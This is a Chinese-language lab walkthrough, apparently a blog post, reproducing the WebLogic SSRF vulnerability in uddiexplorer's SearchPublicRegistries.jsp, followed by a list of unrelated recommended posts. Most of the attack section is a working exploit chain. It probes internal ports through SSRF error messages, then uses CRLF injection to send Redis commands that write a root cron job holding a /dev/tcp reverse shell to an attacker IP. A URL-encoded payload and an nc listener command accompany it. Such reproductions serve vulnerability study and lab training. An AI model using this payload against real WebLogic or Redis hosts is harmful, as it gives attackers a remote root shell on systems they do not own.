Weblogic SSRF漏洞

Weblogic SSRF漏洞

1.环境搭建

复制代码
http://10.9.75.198:7001/uddiexplorer/

2.漏洞复现

复制代码
SSRF漏洞存在于http://10.9.75.198:7001/uddiexplorer/SearchPublicRegistries.jsp

2.1bp抓包,测试该漏洞。通过测试端口,查看哪个端口能够进行具体得操作

复制代码
可访问的端口将会得到错误,一般是返回status code(如下图),如果访问的非http协议,则会返回did not have a valid SOAP content-type。
复制代码
修改为一个不存在的端口,将会返回could not connect over HTTP to server。

2.2注入HTTP头,利用Redis反弹shell

复制代码
 查看redis服务端口
 sudo docker ps -a
 查看redis服务IP
 sudo docker exec -it 9094b4d80469  /bin/bash
 172.13.0.2:6379
复制代码
发送三条redis命令,将弹shell脚本写入/etc/crontab::
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.75.198/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.198%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave


注意,换行符是"\r\n",也就是"%0D%0A"。将url编码后的字符串放在ssrf的域名后面,发送:
http://172.23.0.2:63/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.198%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0A



注:将evil换成kali得IP
复制代码
打开监听:
nc -lnvp 21
相关推荐
嘉里蓝海5 小时前
我在嘉顺达蓝海的安全日常
安全
2301_780789665 小时前
渗透测试真的能发现系统漏洞吗
服务器·网络·安全·web安全·网络安全
嘉里蓝海5 小时前
我在嘉顺达蓝海的安全坚守
安全
你的人类朋友7 小时前
认识一下Bcrypt哈希算法
后端·安全·程序员
Coovally AI模型快速验证11 小时前
基于YOLO集成模型的无人机多光谱风电部件缺陷检测
人工智能·安全·yolo·目标跟踪·无人机
夏天的风9913 小时前
本地部署PLM系统,如何用 ZeroNews 实现远程访问?
安全·远程工作
wanhengidc13 小时前
高性价比云手机挑选指南
运维·网络·安全·游戏·智能手机
拉法豆粉15 小时前
三方软件测试可移植性测试哪些内容
数据库·安全
午夜游鱼17 小时前
Go 泛型实战:一行代码封装 sync.Pool,性能与安全兼得
开发语言·安全·golang
半桔18 小时前
【Linux手册】信号量与建造者模式:以 PV 操作保证并发安全,分步组装构建复杂对象
linux·运维·安全·建造者模式